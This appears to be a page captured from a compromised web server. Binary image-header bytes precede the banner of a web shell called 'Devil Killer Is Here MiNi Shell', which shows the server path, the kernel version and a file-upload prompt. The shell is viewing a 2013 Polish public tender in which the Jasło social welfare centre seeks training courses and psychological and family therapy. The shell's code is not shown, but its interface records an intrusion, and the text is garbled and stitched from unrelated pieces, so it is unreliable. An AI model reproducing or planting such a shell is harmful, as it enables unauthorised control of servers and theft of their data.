JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130704/133377-N-2013.html

<p class="kh_header"><b>Jasło: zorganizowanie i przeprowadzenie usług szkoleniowych oraz świadczenie usługi terapii psychologicznej i terapii rodzin dla osób uczestniczących w projekcie pn.  Czas na aktywność w mieście Jaśle w 2013r. realizowanym przez Miejski Ośrodek Pomocy Społecznej w Jaśle</b><br>
<b>Numer ogłoszenia: 133377 - 2013; data zamieszczenia: 04.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kochanowskiego 3, 38-200 Jasło, woj. podkarpackie, tel. 13 4464328, faks 13 4464328.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopsjaslo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie usług szkoleniowych oraz świadczenie usługi terapii psychologicznej i terapii rodzin dla osób uczestniczących w projekcie pn.  Czas na aktywność w mieście Jaśle w 2013r. realizowanym przez Miejski Ośrodek Pomocy Społecznej w Jaśle.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie usług szkoleniowych (kursów, warsztatów, treningów) oraz świadczenie usługi terapii psychologicznej i terapii rodzin dla osób uczestniczących w projekcie pn.  Czas na aktywność w mieście Jaśle Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Programu Operacyjnego Kapitał Ludzki, w 2013r., realizowanym przez Miejski Ośrodek Pomocy Społecznej w Jaśle.
2. Projekt Czas na aktywność w mieście Jaśle adresowany jest do osób korzystających ze świadczeń pomocy społecznej, bezrobotnych, nieaktywnych zawodowo i/lub zatrudnionych zagrożonych wykluczeniem społecznym. W kursach, warsztatach, treningach i terapii wezmą udział wyłącznie uczestnicy projektu Czas na aktywność w mieście Jaśle skierowani przez MOPS w Jaśle (do grup nie można dołączyć innych kursantów).
3. Przedmiot zamówienia obejmuje sześć części, z których każda stanowi oddzielne zamówienie:
1) Część I:
a) Zadanie nr 1: Kurs opiekunka dzieci i osób starszych z językiem angielskim:
- Liczba uczestników: 5 (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 4 i nie więcej niż 6),
- Czas trwania: 120 godzin edukacyjnych, w tym 20 godzin lektoratu z języka angielskiego (1 godzina zajęć równa jest 45 minutom) realizowanych maksymalnie 6 dni w tygodniu między 8.00 a 18.00 (z wyłączeniem niedziel),
- Termin realizacji: od lipca do 7.09.2013 r.,
- Cel kursu: przygotowanie uczestników do pracy na stanowisku opiekunki dzieci i osób starszych z podstawami języka angielskiego,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9a do SIWZ.
b) Zadanie nr 2: Kurs fryzjerski:
- Liczba uczestników: 4 (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 3 i nie więcej niż 5), 
- Czas trwania: 120 godzin edukacyjnych, (1 godzina zajęć równa jest 45 minutom), na które składają się zajęcia teoretyczne (20 godz.) oraz zajęcia praktyczne (100 godz.), realizowanych maksymalnie 6 dni w tygodniu  między 8.00 a 18.00 (z wyłączeniem niedziel),
- Termin realizacji: od lipca do 7.09.2013 r.
- Cel i problematyka kursu: celem kursu jest zapoznanie z pracą fryzjera, oraz przekazanie wiedzy teoretycznej i praktycznej na poziomie podstawowym z zakresu fryzjerstwa,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9a do SIWZ.
2) Część II:
a) Zadanie nr 1: Kurs Administracyjno-biurowy:
- Liczba uczestników: 7 (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 6 i nie więcej niż 8),
- Czas trwania: 120 godzin edukacyjnych (1 godzina zajęć równa jest 45 minutom) realizowanych maksymalnie 6 dni w tygodniu między 8.00 a 18.00 (z wyłączeniem niedziel),
- Termin realizacji: od lipca do 7.09.2013 r.,
- Cel i problematyka kursu: Celem kursu jest zdobycie podstawowej wiedzy  z zakresu: zasad funkcjonowania biura firmy i organizacji pracy biurowej, praktycznych umiejętności samodzielnego prowadzenia biura,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9b do SIWZ.
b) Zadanie nr 2: Kurs Florystyka z obsługą kas fiskalnych:
- Liczba uczestników: 33 osoby (2 grupy; Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 31 i nie więcej niż 35).
- Czas trwania: 100 godzin edukacyjnych, w tym 20 godzin teoretycznej i praktycznej obsługi kasy fiskalnej (1 godzina zajęć równa jest 45 minutom) realizowanych maksymalnie 6 dni w tygodniu  między 8.00 a 16.00 (z wyłączeniem niedziel).
- Termin realizacji: od lipca do 7.09.2013 r.
- Cel i problematyka kursu: zdobycie przez uczestników kursu wiedzy z zakresu florystyki oraz umiejętności obsługi kasy fiskalnej.
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9b do SIWZ.
3) Część III:
a) Zadanie nr 1: Warsztaty Samozatrudnienie-zakładanie spółdzielni socjalnych wraz z wizytą studyjną do spółdzielni socjalnej:
- Liczba uczestników:  14 osób (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 13 i nie więcej niż 15),
- Czas trwania: 30 godzin edukacyjnych obejmujących zajęcia teoretyczne (1 godzina zajęć równa jest 45 minutom) w godzinach pomiędzy 8:00 a 18:00. oraz 2 dni wizyty studyjnej,
- Termin realizacji warsztatów: od 9 września do 15 września 2013 r.,
- Cel warsztatów: Celem warsztatów jest nabycie wiedzy i umiejętności dotyczących założenia i prowadzenie spółdzielni socjalnej,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9c do SIWZ.
b) Zadanie nr 2: Kurs Kucharz - pizzer - kelner:
- Liczba uczestników:  19 (2 grupy szkoleniowe; Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 18 i nie więcej niż 20). 
- Czas trwania: 150 godzin edukacyjnych, w tym 100 godzin praktycznych (1 godzina zajęć równa jest 45 minutom) realizowanych maksymalnie 6 dni w tygodniu  między 8.00 a 18.00 (z wyłączeniem niedziel).
- Termin realizacji: lipiec-sierpień 2013 r.
- Cel i problematyka kursu: teoretyczne i praktyczne przygotowanie jego uczestników do pracy w zawodzie kucharz- pizzer- kelner. 
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9c do SIWZ.
4) Część IV:
a) Zadanie nr 1: Mnemotechniki:
- Liczba uczestników:  20 osób (dwie grupy: pierwsza -10 osób, druga -10 osób; Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 19 i nie więcej niż 21),
- Czas trwania: 20 godzin edukacyjnych obejmujących zajęcia praktyczne oraz teoretyczne (1 godzina zajęć równa jest 45 minutom) realizowanych:
a. pierwsza grupa: listopad 2013 r. od poniedziałku do piątku od godziny 8:00 do 16:00,
b. druga grupa: listopad 2013 r. w soboty od godziny 8:00 do 18:00.
- Cel warsztatów: Celem jest nabycie wiedzy i umiejętności w zakresie skutecznych technologii uczenia się,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9d do SIWZ.
b) Zadanie nr 2: Trening samooceny i poczucia własnej wartości:
- Liczba uczestników:  25 osób (dwie grupy: pierwsza -16 osób, druga -9 osób w 2013r.; Zamawiający zastrzega sobie możliwość skierowania mniejszej lub większej liczby osób, ale nie mniej niż 24 i nie więcej niż 26 osób),
- Czas trwania i termin realizacji: 20 godzin edukacyjnych obejmujących zajęcia praktyczne oraz teoretyczne (1 godzina zajęć równa jest 45 minutom) realizowanych:
a. pierwsza grupa: w okresie od 1 października do 14 października 
2013 r. godzinach od 8:00 do 16:00 od poniedziałku do piątku,
b. druga grupa: październik 2013 r. w soboty od 8:00 do 18:00.
- Cel treningu: celem będzie rozwijanie samoświadomości, poszerzanie świadomości własnych zalet, stworzenie okazji do twórczej ekspresji własnej osobowości, zachęcanie do pozytywnego myślenia i mówienia o sobie i innych oraz wzmacnianie poczucia własnej wartości,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9d do SIWZ.
5) Część V:
a) Zadanie nr 1: Warsztaty z dziedziny rozwoju osobistego (zajęcia kreatywności połączone z arteterapią i ergoterapią):
- Liczba uczestników:  20 (1 grupa szkoleniowa - Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób, ale nie mniej niż 18 ii nie więcej niż 21 osób),
- Czas trwania: 38 godzin edukacyjnych (1 godzina zajęć równa jest 45 minutom) realizowanych maksymalnie 6 dni w tygodniu (z wyłączeniem niedziel) między 8.00 a 16.00,
- Termin realizacji: od 1 września do 14 września 2013 r.,
- Cel i problematyka warsztatów: Celem będzie przywrócenie sprawności życiowej uczestników projektu. Stosowane na warsztatach metody terapii psychospołecznej pozwolą m.in. na zmniejszenie napięcia w stanach depresyjnych i lękowych, stworzenie u chorego poczucia własnej wartości oraz rozszerzenia kręgu zainteresowań, wzbogacenie jego życia emocjonalnego i aktywizacj, 
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9e do SIWZ.
b) Zadanie nr 2: Warsztaty wychowawcze:
- Liczba uczestników: 23 osoby (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób, ale nie mniej niż 21 i nie więcej niż 25 osób),
- Czas trwania: 40 godzin edukacyjnych (1 godzina zajęć równa jest 45 minutom) obejmujących zajęcia praktyczne oraz teoretyczne - realizowanych maksymalnie przez 5 dni w tygodniu  między godziną 8:00 a 18:00 (z wyłączeniem sobót i niedziel), obejmujących nie więcej niż 8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć edukacyjnych, jak i przerwy między zajęciami,
- Termin realizacji warsztatów: październik - listopad 2013 r.,
- Cel warsztatów: Celem warsztatów będzie rozwijanie umiejętności wychowawczych poprzez wzrost wiedzy z zakresu specyfiki funkcjonowania dziecka oraz rozwój kompetencji rodzicielskich, 
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9e do SIWZ.
6) Część VI:
a) Zadanie nr 1: Indywidualna terapia psychologiczna:
- Liczba uczestników: 6 osób (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób, ale nie mniej niż 4 i nie więcej niż 7 osób),
- Czas trwania: po 10 godzin na osobę (6 osób),
- Termin realizacji: od sierpnia do grudnia 2013 r.,
- Cel: celem terapii jest wspomaganie funkcjonowania jednostki w codziennym życiu, zwiększenie skuteczności działania, wspieranie w osobistym rozwoju,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9f do SIWZ.
b) Zadanie nr 2: Terapia rodzin:
- Liczba uczestników: 3 osoby (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób, nie mniej niż 2 i nie więcej niż 4 osoby),
- Czas trwania: 3 osoby jeden raz w miesiącu począwszy od sierpnia 2013 do grudnia 2013 (5 sesji po 1,5 godziny zegarowej na osobę),
- Termin realizacji: od sierpnia do grudnia 2013 r.,
- Cel: przepracowanie trudności i rozwiązanie konfliktów, które powodują pogorszenie relacji i życia w rodzinie. Omawianie problemów wspólnie z terapeutą daje możliwość odkrycia przyczyny trudności, znalezienia nowej perspektywy ich rozwiązania, wzmocnienia zasobów, wzajemnego zrozumienia czy wypracowania konstruktywnych zmian,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9f do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.41.40.00-9, 80.00.00.00-4, 80.34.00.00-9, 80.40.00.00-8, 80.50.00.00-9, 80.51.00.00-2, 80.53.00.00-8, 80.57.00.00-0, 85.12.12.70-6, 85.31.24.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania tego warunku odbędzie się na podstawie oświadczenia - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem w przeprowadzeniu (zakończeniu) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- w zakresie Części I: przynajmniej jednego kursu opiekunki dzieci i osób starszych z językiem angielskim oraz przynajmniej jednego kursu fryzjerskiego,
- w zakresie Części II: przynajmniej jednego kursu administracyjno-biurowego oraz przynajmniej jednego kursu florystyki,
- w zakresie Części III: przynajmniej jednego kursu z zakresu kucharza,
- w zakresie Części IV: przynajmniej jednych warsztatów z zakresu mnemotechniki oraz przynajmniej jednego treningu samooceny i poczucia własnej wartości, 
- w zakresie Części V: przynajmniej jednych warsztatów z dziedziny rozwoju osobistego w zakresie arteterapii lub ergoterapii oraz przynajmniej jednych warsztatów wychowawczych, 
- w zakresie Części VI: przynajmniej trzech terapii psychologicznych, 
ocena spełniania tego warunku odbędzie się na podstawie oświadczenia - załącznik nr 3 do SIWZ, wykazu wykonanych usług - załącznik nr 4 do SIWZ oraz zobowiązania innych podmiotów - załącznik nr 6do SIWZ(jeżeli dotyczy)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania tego warunku odbędzie się na podstawie oświadczenia - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować przynajmniej:
- w zakresie Części I: jedną osobą, która będzie brała udział w realizacji przedmiotu zamówienia i wykaże się, że przeprowadziła przynajmniej dwa kursy opiekunki dzieci i osób starszych z językiem angielskim oraz jedną osobą, która będzie brała udział w realizacji przedmiotu zamówienia i wykaże się, że przeprowadziła przynajmniej dwa kursy fryzjerskie;
- w zakresie Części II: jedną osobą, która będzie brała udział w realizacji przedmiotu zamówienia i wykaże się, że przeprowadziła przynajmniej dwa kursy administracyjno-biurowe oraz jedną osobą, która będzie brała udział w realizacji przedmiotu zamówienia i wykaże się, że przeprowadziła przynajmniej dwa kursy florystyki;
- w zakresie Części III: jedną osobą, która będzie brała udział w realizacji przedmiotu zamówienia i wykaże się, że przeprowadziła przynajmniej jedne zajęcia w zakresie spółdzielczości socjalnej oraz jedną osobą, która będzie brała udział w realizacji przedmiotu zamówienia i wykaże się, że przeprowadziła przynajmniej dwa kursy kucharza;
- w zakresie Części IV: jedną osobą, która będzie brała udział w realizacji przedmiotu zamówienia i wykaże się, że przeprowadziła przynajmniej jedne warsztaty z zakresu mnemotechniki oraz jedną osobą, która będzie brała udział w realizacji przedmiotu zamówienia i wykaże się, że przeprowadziła przynajmniej jeden trening samooceny i poczucia własnej wartości;
- w zakresie Części V: jedną osobą, która będzie brała udział w realizacji przedmiotu zamówienia i wykaże się, że przeprowadziła przynajmniej jedne warsztaty z dziedziny rozwoju osobistego w zakresie arteterapii lub ergoterapii oraz jedną osobą, która będzie brała udział w realizacji przedmiotu zamówienia i wykaże się, że przeprowadziła przynajmniej jedne warsztaty wychowawcze;
- w zakresie Części VI: jednym psychoterapeutą posiadającym certyfikat Polskiego Towarzystwa Psychologicznego lub osobą będącą w trakcie szkolenia z psychoterapii i pracującą czynnie jako psychoterapeuta oraz przynajmniej dwiema osobami, które ukończyły szkolenie z zakresu systemowej terapii rodzin. 
Ocena spełniania tego warunku odbędzie się na podstawie oświadczenia - załącznik nr 3 do SIWZ, wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia - załącznik nr 5 do SIWZ oraz zobowiązania innych podmiotów - załącznik nr 6 do SIWZ (jeżeli dotyczy)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania tego warunku odbędzie się na podstawie oświadczenia - załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Jeżeli Wykonawcy ubiegają się wspólnie o udzielenie zamówienia - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
2) Upoważnienie do podpisania oferty, o ile nie wynika ono z dokumentów dołączonych do oferty,
3) Zobowiązanie innych podmiotów - załącznik nr 6 do SIWZ (jeżeli dotyczy) - oryginał</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) Zmiana umowy może nastąpić, po ewentualnej zmianie przepisu dotyczącego wysokości stawki podatku od towarów i usług VAT, co skutkować będzie zmianą kwoty netto i naliczonych kwot podatku VAT, do usług wykonywanych po dniu w którym przepisy zaczną obowiązywać. 
b) Zmiana umowy może nastąpić w okoliczności zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności,
- której nie można przypisać drugiej stronie;
